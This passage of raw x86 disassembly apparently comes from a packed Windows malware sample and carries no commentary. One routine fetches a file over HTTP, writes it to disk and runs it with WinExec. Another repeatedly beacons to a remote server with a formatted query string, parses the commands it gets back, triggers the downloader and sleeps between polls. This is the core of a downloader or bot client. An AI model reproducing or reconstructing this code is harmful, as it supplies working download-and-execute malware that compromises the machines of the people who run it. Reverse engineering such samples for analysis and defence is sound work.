cmp [esp+eax+54Ch+var_411], 2Fh
jz short loc_403621
lea edi, [esp+54Ch+var_410]
dec edi
jmp short loc_403610
; ---------------------------------------------------------------------------
align 10h
loc_403610: ; CODE XREF: sub_4033F0+21B�j
; sub_4033F0+226�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_403610
mov ax, word_4243BC
mov [edi], ax
loc_403621: ; CODE XREF: sub_4033F0+1F3�j
; sub_4033F0+211�j
lea eax, [esp+54Ch+var_30C]
mov esi, eax
lea ebx, [ebx+0]
loc_403630: ; CODE XREF: sub_4033F0+245�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403630
lea edi, [esp+54Ch+var_410]
sub eax, esi
dec edi
loc_403641: ; CODE XREF: sub_4033F0+257�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403641
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+54Ch+var_410]
push ecx
call sub_419A76
add esp, 4
push 5
push offset dword_428F40
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea edx, [esp+550h+var_410]
push edx
call sub_4199F0
add esp, 8
test eax, eax
jz loc_40371A
lea edi, [esp+54Ch+var_410]
mov byte ptr [eax], 0
dec edi
lea esp, [esp+0]
loc_4036A0: ; CODE XREF: sub_4033F0+2B6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4036A0
mov ax, word_4243EC
mov [edi], ax
lea eax, [esp+54Ch+var_524]
mov esi, eax
loc_4036B7: ; CODE XREF: sub_4033F0+2CC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4036B7
lea edi, [esp+54Ch+var_410]
sub eax, esi
dec edi
loc_4036C8: ; CODE XREF: sub_4033F0+2DE�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4036C8
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 5
rep movsb
push offset dword_428F48
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
loc_4036F1: ; CODE XREF: sub_4033F0+306�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4036F1
lea edi, [esp+54Ch+var_410]
sub eax, ecx
mov esi, ecx
dec edi
loc_403704: ; CODE XREF: sub_4033F0+31A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403704
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_40371A: ; CODE XREF: sub_4033F0+29B�j
push ebp
push 0
push 0
push 0
push 0
lea ecx, [esp+560h+var_514]
push 0
mov [esp+564h+var_538], ecx
call dword_424210 ; InternetOpenA
push 0
push 0
push 3
push 0
push 0
push 50h
lea edx, [esp+564h+var_204]
mov ebp, eax
push edx
push ebp
mov [esp+56Ch+var_52C], ebp
call dword_424200 ; InternetConnectA
push 0
push 0
push 0
push 0
mov esi, eax
push 0
lea eax, [esp+560h+var_100]
push eax
push 4
push offset dword_428F50
mov ecx, offset off_42AE60
mov dword ptr [esp+56Ch+var_530], esi
call sub_406AE0
push eax
push esi
call dword_42421C ; HttpOpenRequestA
mov ebx, dword_424208
mov edi, eax
xor esi, esi
nop
loc_403790: ; CODE XREF: sub_4033F0+3B3�j
push 0
push 0
push 0
push 0
push edi
call ebx ; HttpSendRequestA
test eax, eax
jnz short loc_4037A5
inc esi
cmp esi, 5
jl short loc_403790
loc_4037A5: ; CODE XREF: sub_4033F0+3AD�j
mov esi, dword_424218
mov dword ptr [esp+54Ch+var_528], 4
xor ebx, ebx
loc_4037B5: ; CODE XREF: sub_4033F0+3E9�j
push 0
lea ecx, [esp+550h+var_528]
push ecx
lea edx, [esp+554h+var_538]
push edx
push 20000005h
push edi
call esi ; HttpQueryInfoA
test eax, eax
mov ecx, [esp+54Ch+var_538]
jz short loc_4037D5
test ecx, ecx
ja short loc_4037DB
loc_4037D5: ; CODE XREF: sub_4033F0+3DF�j
inc ebx
cmp ebx, 5
jl short loc_4037B5
loc_4037DB: ; CODE XREF: sub_4033F0+3E3�j
test eax, eax
jz loc_4038F4
test ecx, ecx
jbe loc_4038F4
mov ebx, dword_424074
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [esp+564h+var_510]
push eax
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_403855
push 0
push 80h
push 2
push 0
lea ecx, [esp+564h+var_414]
push 0
push 40000000h
mov edx, ecx
push edx
mov [esp+570h+var_53C], ecx
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_403855
xor eax, eax
loc_40383C: ; CODE XREF: sub_4033F0+51C�j
pop ebp
pop ebx
pop edi
pop esi
mov ecx, [esp+544h+var_4]
call sub_4192B6
add esp, 544h
retn 8
; ---------------------------------------------------------------------------
loc_403855: ; CODE XREF: sub_4033F0+41F�j
; sub_4033F0+448�j
mov eax, [esp+554h+var_540]
cmp eax, 100000h
jbe short loc_4038A1
push 100001h
call sub_4191BC
mov ebp, dword_424214
add esp, 4
mov ebx, eax
loc_403875: ; CODE XREF: sub_4033F0+4AD�j
lea eax, [esp+54Ch+var_53C]
push eax
push 100000h
push ebx
push edi
call ebp ; InternetReadFile
mov edx, [esp+54Ch+var_53C]
push 0
lea ecx, [esp+550h+var_524]
push ecx
push edx
push ebx
push esi
call dword_4240A8 ; WriteFile
mov eax, [esp+54Ch+var_53C]
test eax, eax
ja short loc_403875
jmp short loc_4038D3
; ---------------------------------------------------------------------------
loc_4038A1: ; CODE XREF: sub_4033F0+46E�j
inc eax
push eax
call sub_4191BC
mov ecx, [esp+558h+var_540]
add esp, 4
mov ebx, eax
lea eax, [esp+554h+var_544]
push eax
push ecx
push ebx
push edi
call dword_424214 ; InternetReadFile
mov eax, [esp+54Ch+var_53C]
push 0
lea edx, [esp+550h+var_524]
push edx
push eax
push ebx
push esi
call dword_4240A8 ; WriteFile
loc_4038D3: ; CODE XREF: sub_4033F0+4AF�j
push ebx
call sub_4198AE
add esp, 4
push esi
call dword_42406C ; CloseHandle
mov ecx, [esp+54Ch+var_534]
push 1
push ecx
call dword_4240B0 ; WinExec
mov ebp, [esp+54Ch+var_52C]
loc_4038F4: ; CODE XREF: sub_4033F0+3ED�j
; sub_4033F0+3F5�j
mov esi, dword_424204
push edi
call esi ; InternetCloseHandle
mov edx, [esp+550h+var_534]
push edx
call esi ; InternetCloseHandle
push ebp
call esi ; InternetCloseHandle
mov eax, 1
jmp loc_40383C
; ---------------------------------------------------------------------------
loc_403911: ; CODE XREF: sub_4033F0+1D�j
; sub_4033F0+2C�j
mov ecx, [esp+54Ch+var_4]
pop edi
xor eax, eax
pop esi
call sub_4192B6
add esp, 544h
retn 8
sub_4033F0 endp
; ---------------------------------------------------------------------------
align 10h
loc_403930: ; DATA XREF: UPX0:off_4243CC�o
push esi
mov esi, ecx
call sub_402880
test byte ptr [esp+8], 1
jz short loc_403948
push esi
call sub_41930D
add esp, 4
loc_403948: ; CODE XREF: UPX0:0040393D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403950 proc near ; DATA XREF: UPX0:004243D0�o
var_E5C = dword ptr -0E5Ch
var_E58 = dword ptr -0E58h
var_E54 = dword ptr -0E54h
var_E50 = byte ptr -0E50h
var_E4C = dword ptr -0E4Ch
var_E48 = dword ptr -0E48h
var_E44 = dword ptr -0E44h
var_E40 = dword ptr -0E40h
var_E3C = byte ptr -0E3Ch
var_D38 = byte ptr -0D38h
var_C34 = byte ptr -0C34h
var_A34 = byte ptr -0A34h
var_930 = byte ptr -930h
var_82C = byte ptr -82Ch
var_728 = byte ptr -728h
var_624 = byte ptr -624h
var_520 = byte ptr -520h
var_41C = byte ptr -41Ch
var_31C = byte ptr -31Ch
var_29D = byte ptr -29Dh
var_29C = byte ptr -29Ch
var_198 = byte ptr -198h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_403950
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0E50h
mov eax, dword_42A290
push ebx
mov ebx, ecx
mov [ebp+var_14], eax
mov eax, [ebx+238h]
test eax, eax
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_E4C], ebx
mov [ebp+var_4], 0
jz loc_404513
push 32000h
call sub_4191BC
add esp, 4
push 0FFFFFFFEh
mov [ebp+var_E40], eax
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
push 0
call sub_419875
push eax
call sub_419846
add esp, 8
jmp short loc_4039D0
; ---------------------------------------------------------------------------
align 10h
loc_4039D0: ; CODE XREF: sub_403950+7B�j
; sub_403950+BAE�j
mov eax, [ebx+23Ch]
xor esi, esi
cmp eax, esi
jnz loc_404504
mov ecx, [ebx+18h]
lea eax, [ebp+var_E5C]
push eax
call sub_406670
cmp eax, esi
jz short loc_403A16
mov ecx, [ebp+var_E5C]
mov edx, [ebx+250h]
cmp ecx, edx
lea eax, [ebx+250h]
jl short loc_403A0D
mov [eax], ecx
jmp short loc_403A16
; ---------------------------------------------------------------------------
loc_403A0D: ; CODE XREF: sub_403950+B7�j
mov ecx, [ebx+18h]
push eax
call sub_406730
loc_403A16: ; CODE XREF: sub_403950+A1�j
; sub_403950+BB�j
mov ecx, [ebx+250h]
push ecx
lea edx, [ebx+240h]
push offset dword_42441C
push edx
call sub_419B8A
add esp, 0Ch
mov [ebx+234h], esi
mov [ebp+var_E58], esi
mov [ebp+var_E48], 0FFFFFFFFh
jmp short loc_403A50
; ---------------------------------------------------------------------------
align 10h
loc_403A50: ; CODE XREF: sub_403950+F7�j
; sub_403950+440�j ...
mov eax, [ebx+23Ch]
test eax, eax
jnz loc_404504
mov ecx, [ebx+20h]
push 0
call sub_40BAE0
test eax, eax
jz loc_4044E1
mov eax, [ebp+var_E58]
test eax, eax
mov eax, [ebp+var_E48]
jnz loc_403D95
inc eax
cmp eax, 1Eh
mov [ebp+var_E48], eax
jl loc_403DAF
mov [ebp+var_E58], 1
mov [ebp+var_E48], 0
loc_403AA8: ; CODE XREF: sub_403950+45A�j
mov eax, [ebx+2Ch]
mov ecx, [ebp+var_E48]
mov ecx, [eax+ecx*4]
lea edx, [ebp+var_41C]
lea ebx, [ebx+0]
loc_403AC0: ; CODE XREF: sub_403950+178�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_403AC0
loc_403ACA: ; CODE XREF: sub_403950+48F�j
; sub_403950+49B�j
lea edx, [ebp+var_29C]
push edx
lea eax, [ebp+var_41C]
push eax
call sub_40EF50
add esp, 8
lea ecx, [ebp+var_A34]
push ecx
lea edx, [ebp+var_41C]
push edx
call sub_40EFC0
lea eax, [ebp+var_29C]
add esp, 8
lea edx, [eax+1]
nop
loc_403B00: ; CODE XREF: sub_403950+1B5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403B00
sub eax, edx
cmp [ebp+eax+var_29D], 5Ch
jz short loc_403B51
lea eax, [ebp+var_29C]
lea edx, [eax+1]
lea esp, [esp+0]
loc_403B20: ; CODE XREF: sub_403950+1D5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403B20
sub eax, edx
cmp [ebp+eax+var_29D], 2Fh
jz short loc_403B51
lea edi, [ebp+var_29C]
dec edi
lea ebx, [ebx+0]
loc_403B40: ; CODE XREF: sub_403950+1F6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_403B40
mov ax, word_424418
mov [edi], ax
loc_403B51: ; CODE XREF: sub_403950+1C1�j
; sub_403950+1E1�j
push 0
push 0
push 0
push 0
push 0
call dword_424210 ; InternetOpenA
test eax, eax
mov [ebp+var_E54], eax
jz loc_4044E1
push 0
push 0
push 3
push 0
push 0
push 50h
lea ecx, [ebp+var_A34]
push ecx
push eax
call dword_424200 ; InternetConnectA
mov [ebp+var_E44], eax
lea ecx, [ebp+var_29C]
lea edx, [ebp+var_198]
jmp short loc_403BA0
; ---------------------------------------------------------------------------
align 10h
loc_403BA0: ; CODE XREF: sub_403950+24B�j
; sub_403950+258�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_403BA0
lea eax, [ebx+30h]
mov esi, eax
nop
loc_403BB0: ; CODE XREF: sub_403950+265�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403BB0
lea edi, [ebp+var_198]
sub eax, esi
dec edi
loc_403BC0: ; CODE XREF: sub_403950+276�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403BC0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_E40]
lea edx, [ebp+var_E50]
push edx
mov eax, 32000h
push eax
push ecx
push 0
mov byte ptr [ecx], 0
mov ecx, [ebp+var_E44]
lea eax, [ebp+var_198]
push eax
push ecx
mov ecx, ebx
call sub_402FE0
lea ecx, [ebp+var_29C]
lea edx, [ebp+var_198]
loc_403C10: ; CODE XREF: sub_403950+2C8�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_403C10
lea eax, [ebx+130h]
mov esi, eax
loc_403C22: ; CODE XREF: sub_403950+2D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403C22
lea edi, [ebp+var_198]
sub eax, esi
dec edi
loc_403C32: ; CODE XREF: sub_403950+2E8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403C32
mov edx, [ebp+var_E40]
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 8
push offset dword_428EAC
mov ecx, offset off_42AE60
mov byte ptr [edx], 0
call sub_406AE0
mov ecx, eax
lea edx, [ebp+var_520]
lea ebx, [ebx+0]
loc_403C70: ; CODE XREF: sub_403950+328�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_403C70
lea eax, [ebp+var_A34]
mov edx, eax
loc_403C82: ; CODE XREF: sub_403950+337�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403C82
lea edi, [ebp+var_520]
sub eax, edx
dec edi
loc_403C92: ; CODE XREF: sub_403950+348�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403C92
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_198]
rep movsb
mov ecx, eax
loc_403CB2: ; CODE XREF: sub_403950+367�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403CB2
lea edi, [ebp+var_520]
sub eax, ecx
mov esi, ecx
dec edi
loc_403CC4: ; CODE XREF: sub_403950+37A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403CC4
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_E50]
push eax
rep movsb
mov ecx, [ebp+var_E40]
mov eax, 32000h
push eax
mov eax, [ebp+var_E44]
push ecx
push 0
lea edx, [ebp+var_198]
push edx
push eax
mov ecx, ebx
call sub_402FE0
mov edi, [ebp+var_E40]
lea ecx, [ebp+var_94]
push ecx
push edi
mov ecx, ebx
mov esi, eax
mov [ebp+var_94], 0
mov [ebp+var_31C], 0
call sub_402DA0
lea edx, [ebp+var_31C]
push edx
push edi
mov ecx, ebx
call sub_402E90
mov eax, [ebx+230h]
push eax
lea ecx, [ebp+var_94]
push ecx
call sub_419312
add esp, 8
test esi, esi
jz short loc_403D6D
test eax, eax
jnz short loc_403D6D
lea edx, [ebp+var_94]
push edx
mov ecx, ebx
call sub_402E60
test eax, eax
jz loc_403DF0
loc_403D6D: ; CODE XREF: sub_403950+401�j
; sub_403950+405�j
mov eax, [ebp+var_E44]
mov esi, dword_424204
push eax
call esi ; InternetCloseHandle
mov ecx, [ebp+var_E54]
push ecx
call esi ; InternetCloseHandle
push 2BF20h
call dword_42408C ; Sleep
jmp loc_403A50
; ---------------------------------------------------------------------------
loc_403D95: ; CODE XREF: sub_403950+12E�j
mov ecx, [ebx+234h]
inc eax
cmp eax, ecx
mov [ebp+var_E48], eax
jge loc_4044E1
jmp loc_403AA8
; ---------------------------------------------------------------------------
loc_403DAF: ; CODE XREF: sub_403950+13E�j
mov ecx, [ebp+var_E48]
mov eax, [ebx+28h]
mov eax, [eax+ecx*4]
mov edi, offset byte_4243C3
mov esi, eax
mov ecx, 1
xor edx, edx
repe cmpsb
jz short loc_403DE4
mov ecx, eax
lea edx, [ebp+var_41C]
loc_403DD5: ; CODE XREF: sub_403950+48D�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_403DD5
jmp loc_403ACA
; ---------------------------------------------------------------------------
loc_403DE4: ; CODE XREF: sub_403950+47B�j
mov [ebp+var_41C], 0
jmp loc_403ACA
; ---------------------------------------------------------------------------
loc_403DF0: ; CODE XREF: sub_403950+417�j
lea ecx, [ebp+var_29C]
lea edx, [ebp+var_198]
lea esp, [esp+0]
loc_403E00: ; CODE XREF: sub_403950+4B8�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_403E00
lea eax, [ebp+var_31C]
mov esi, eax
loc_403E12: ; CODE XREF: sub_403950+4C7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403E12
lea edi, [ebp+var_198]
sub eax, esi
dec edi
loc_403E22: ; CODE XREF: sub_403950+4D8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403E22
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_E40]
lea edx, [ebp+var_E50]
push edx
mov edx, [ebp+var_E44]
mov eax, 32000h
push eax
push ecx
mov byte ptr [ecx], 0
lea eax, [ebp+var_520]
push eax
lea ecx, [ebp+var_198]
push ecx
push edx
mov ecx, ebx
call sub_402FE0
mov esi, [ebp+var_E40]
lea eax, [ebp+var_94]
push eax
push esi
mov ecx, ebx
mov [ebp+var_94], 0
call sub_402DA0
lea ecx, [ebp+var_94]
push ecx
mov ecx, ebx
call sub_402E60
test eax, eax
jz short loc_403EC1
mov edx, [ebp+var_E44]
mov esi, dword_424204
push edx
call esi ; InternetCloseHandle
mov eax, [ebp+var_E54]
push eax
call esi ; InternetCloseHandle
push 2BF20h
call dword_42408C ; Sleep
jmp loc_403A50
; ---------------------------------------------------------------------------
loc_403EC1: ; CODE XREF: sub_403950+547�j
push 7
push offset dword_428EB4
mov ecx, offset off_42AE60
mov [ebp+var_624], 0
mov [ebp+var_728], 0
mov [ebp+var_82C], 0
call sub_406AE0
lea ecx, [ebp+var_624]
push ecx
push eax
push esi
mov ecx, ebx
call sub_402F70
push 7
push offset dword_428EBC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [ebp+var_728]
push edx
push eax
push esi
mov ecx, ebx
call sub_402F70
push 7
push offset dword_428EC4
mov ecx, offset off_42AE60
call sub_406AE0
lea ecx, [ebp+var_82C]
push ecx
push eax
push esi
mov ecx, ebx
call sub_402F70
mov edx, [ebx+250h]
push edx
lea eax, [ebx+240h]
push eax
push 2
push 1
push 14h
lea ecx, [ebp+var_C34]
push offset a?aDD00DDS04x ; "?a=%d&d=0:0:%d:%d:%s:%04x"
push ecx
call sub_419B8A
add esp, 1Ch
lea eax, [ebp+var_29C]
lea ecx, [ebp+var_198]
lea ecx, [ecx+0]
loc_403F70: ; CODE XREF: sub_403950+628�j
mov dl, [eax]
inc eax
mov [ecx], dl
inc ecx
test dl, dl
jnz short loc_403F70
lea eax, [ebp+var_31C]
mov edx, eax
loc_403F82: ; CODE XREF: sub_403950+637�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403F82
lea edi, [ebp+var_198]
sub eax, edx
dec edi
loc_403F92: ; CODE XREF: sub_403950+648�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403F92
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_C34]
rep movsb
mov ecx, eax
loc_403FB2: ; CODE XREF: sub_403950+667�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403FB2
lea edi, [ebp+var_198]
sub eax, ecx
mov esi, ecx
dec edi
loc_403FC4: ; CODE XREF: sub_403950+67A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_403FC4
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_E40]
lea edx, [ebp+var_E50]
push edx
mov eax, 32000h
push eax
push ecx
push 0
mov byte ptr [ecx], 0
mov ecx, [ebp+var_E44]
lea eax, [ebp+var_198]
push eax
push ecx
mov ecx, ebx
call sub_402FE0
mov eax, [ebx+23Ch]
test eax, eax
jnz loc_404504
mov edi, offset byte_4243C3
lea esi, [ebp+var_624]
mov ecx, 1
xor edx, edx
repe cmpsb
jz loc_4040F0
lea ecx, [ebp+var_29C]
lea edx, [ebp+var_198]
lea esp, [esp+0]
loc_404040: ; CODE XREF: sub_403950+6F8�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_404040
lea eax, [ebp+var_624]
mov esi, eax
loc_404052: ; CODE XREF: sub_403950+707�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404052
lea edi, [ebp+var_198]
sub eax, esi
dec edi
loc_404062: ; CODE XREF: sub_403950+718�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_404062
mov edx, [ebp+var_E44]
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_E50]
push eax
rep movsb
mov ecx, [ebp+var_E40]
mov eax, 32000h
push eax
push ecx
mov byte ptr [ecx], 0
push 0
lea ecx, [ebp+var_198]
push ecx
push edx
mov ecx, ebx
call sub_402FE0
mov esi, [ebp+var_E40]
lea eax, [ebp+var_94]
push eax
push esi
mov ecx, ebx
mov [ebp+var_94], 0
call sub_402DA0
lea ecx, [ebp+var_94]
push ecx
mov ecx, ebx
call sub_402E60
test eax, eax
jz loc_40436C
mov edx, [ebp+var_E44]
mov esi, dword_424204
push edx
call esi ; InternetCloseHandle
mov eax, [ebp+var_E54]
push eax
call esi ; InternetCloseHandle
loc_4040F0: ; CODE XREF: sub_403950+6DA�j
; sub_403950+A2C�j ...
mov eax, [ebx+23Ch]
test eax, eax
jnz loc_404504
mov edi, offset byte_4243C3
lea esi, [ebp+var_728]
mov ecx, 1
xor eax, eax
repe cmpsb
jz loc_404205
lea ecx, [ebp+var_29C]
lea edx, [ebp+var_198]
loc_404124: ; CODE XREF: sub_403950+7DC�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_404124
lea eax, [ebp+var_728]
mov esi, eax
loc_404136: ; CODE XREF: sub_403950+7EB�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404136
lea edi, [ebp+var_198]
sub eax, esi
dec edi
loc_404146: ; CODE XREF: sub_403950+7FC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_404146
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_E40]
lea edx, [ebp+var_E50]
push edx
mov eax, 32000h
push eax
push ecx
push 0
mov byte ptr [ecx], 0
mov ecx, [ebp+var_E44]
lea eax, [ebp+var_198]
push eax
push ecx
mov ecx, ebx
call sub_402FE0
mov esi, [ebp+var_E40]
lea edx, [ebp+var_94]
push edx
push esi
mov ecx, ebx
mov [ebp+var_94], 0
call sub_402DA0
lea eax, [ebp+var_94]
push eax
mov ecx, ebx
call sub_402E60
test eax, eax
jnz short loc_404205
push offset dword_4243F4
push esi
call sub_419C6F
add esp, 8
test eax, eax
jz short loc_404205
push eax
call sub_419C6A
mov esi, eax
mov eax, [ebx+250h]
add esp, 4
cmp esi, eax
jle short loc_404205
nop
loc_4041E0: ; CODE XREF: sub_403950+8AD�j
push offset dword_4243F4
push 0
call sub_419C6F
add esp, 8
test eax, eax
jz short loc_404205
push eax
mov ecx, ebx
call sub_4030C0
test eax, eax
jz short loc_4041E0
mov [ebx+250h], esi
loc_404205: ; CODE XREF: sub_403950+7C2�j
; sub_403950+866�j ...
lea ecx, [ebx+250h]
push ecx
mov ecx, [ebx+18h]
call sub_406730
mov eax, [ebx+23Ch]
test eax, eax
jnz loc_404504
mov edi, offset byte_4243C3
lea esi, [ebp+var_82C]
mov ecx, 1
xor edx, edx
repe cmpsb
jz loc_4044C3
lea ecx, [ebp+var_29C]
lea edx, [ebp+var_198]
loc_404248: ; CODE XREF: sub_403950+900�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_404248
lea eax, [ebp+var_82C]
mov esi, eax
lea ebx, [ebx+0]
loc_404260: ; CODE XREF: sub_403950+915�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404260
lea edi, [ebp+var_198]
sub eax, esi
dec edi
loc_404270: ; CODE XREF: sub_403950+926�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_404270
mov edx, [ebp+var_E44]
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+var_E40]
mov edi, [ebp+var_E4C]
lea eax, [ebp+var_E50]
push eax
mov eax, 32000h
push eax
push esi
push 0
lea ecx, [ebp+var_198]
push ecx
push edx
mov ecx, edi
mov byte ptr [esi], 0
call sub_402FE0
lea eax, [ebp+var_94]
push eax
push esi
mov ecx, edi
mov [ebp+var_94], 0
call sub_402DA0
lea ecx, [ebp+var_94]
push ecx
mov ecx, edi
call sub_402E60
test eax, eax
jnz loc_4044C3
mov edx, esi
push offset dword_4243F4
push edx
call sub_419C6F
mov esi, edi
add esi, 254h
mov ebx, eax
xor eax, eax
mov ecx, 1021h
mov edi, esi
rep stosd
mov eax, [ebp+var_E4C]
mov ecx, [eax+18h]
add esp, 8
push esi
call sub_4067D0
lea ebx, [ebx+0]
loc_404320: ; CODE XREF: sub_403950+A1A�j
test ebx, ebx
jz loc_4044C3
push ebx
call sub_419C6A
add esp, 4
mov [ebp+var_E48], eax
jmp short loc_404340
; ---------------------------------------------------------------------------
align 10h
loc_404340: ; CODE XREF: sub_403950+9E7�j
; sub_403950+AD0�j ...
push offset dword_4243F4
push 0
call sub_419C6F
mov ebx, eax
add esp, 8
test ebx, ebx
mov [ebp+var_E58], ebx
jnz short loc_4043B3
mov ecx, [ebp+var_E4C]
mov ecx, [ecx+18h]
push esi
call sub_4069B0
jmp short loc_404320
; ---------------------------------------------------------------------------
loc_40436C: ; CODE XREF: sub_403950+782�j
push offset dword_4243F4
push esi
loc_404372: ; CODE XREF: sub_403950+A61�j
call sub_419C6F
add esp, 8
test eax, eax
jz loc_4040F0
mov esi, [ebx+234h]
cmp esi, 0Ah
jge loc_4040F0
mov edx, [ebx+2Ch]
mov edx, [edx+esi*4]
inc esi
mov ecx, eax
mov [ebx+234h], esi
loc_4043A0: ; CODE XREF: sub_403950+A58�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_4043A0
push offset dword_4243F4
push 0
jmp short loc_404372
; ---------------------------------------------------------------------------
loc_4043B3: ; CODE XREF: sub_403950+A09�j
lea edx, [ebp+var_930]
push edx
push ebx
call sub_40EEF0
add esp, 8
lea eax, [ebp+var_D38]
push eax
push ebx
call sub_40EF50
add esp, 8
lea ecx, [ebp+var_E3C]
push ecx
push ebx
call sub_40EFC0
add esp, 8
xor edi, edi
loc_4043E5: ; CODE XREF: sub_403950+B0A�j
cmp edi, [esi]
jge short loc_40445C
mov eax, [ebp+var_E4C]
mov edx, edi
imul edx, 204h
lea ebx, [edx+eax]
lea ecx, [ebp+var_930]
push ecx
lea edx, [ebx+35Ch]
push edx
call sub_419312
add esp, 8
test eax, eax
jnz short loc_404453
mov eax, [ebp+var_E48]
cmp eax, [ebx+258h]
jle loc_404340
mov ecx, [ebp+var_E4C]
mov edx, [ecx+1Ch]
mov eax, [ebp+var_E58]
add edx, 20Ch
push edx
push eax
call sub_4033F0
mov ecx, [ebp+var_E48]
mov [ebx+258h], ecx
jmp loc_404340
; ---------------------------------------------------------------------------
loc_404453: ; CODE XREF: sub_403950+AC2�j
mov ebx, [ebp+var_E58]
inc edi
jmp short loc_4043E5
; ---------------------------------------------------------------------------
loc_40445C: ; CODE XREF: sub_403950+A97�j
xor eax, eax
jnz loc_404340
mov edx, [esi]
mov edi, [ebp+var_E4C]
imul edx, 204h
mov eax, [ebp+var_E48]
mov [edx+edi+258h], eax
mov edx, [esi]
imul edx, 204h
lea ecx, [ebp+var_930]
lea edx, [edx+edi+35Ch]
loc_404494: ; CODE XREF: sub_403950+B4C�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_404494
mov eax, [edi+254h]
lea esi, [edi+254h]
inc eax
mov [esi], eax
mov eax, [edi+1Ch]
add eax, 20Ch
push eax
push ebx
mov ecx, edi
call sub_4033F0
jmp loc_404340
; ---------------------------------------------------------------------------
loc_4044C3: ; CODE XREF: sub_403950+8E6�j
; sub_403950+990�j ...
mov ecx, [ebp+var_E44]
mov esi, dword_424204
push ecx
call esi ; InternetCloseHandle
mov edx, [ebp+var_E54]
push edx
call esi ; InternetCloseHandle
mov ebx, [ebp+var_E4C]
loc_4044E1: ; CODE XREF: sub_403950+11A�j
; sub_403950+219�j ...
mov eax, [ebx+23Ch]
test eax, eax
jnz short loc_404504
push 1B7740h
call dword_42408C ; Sleep
mov eax, [ebx+23Ch]
test eax, eax
jz loc_4039D0
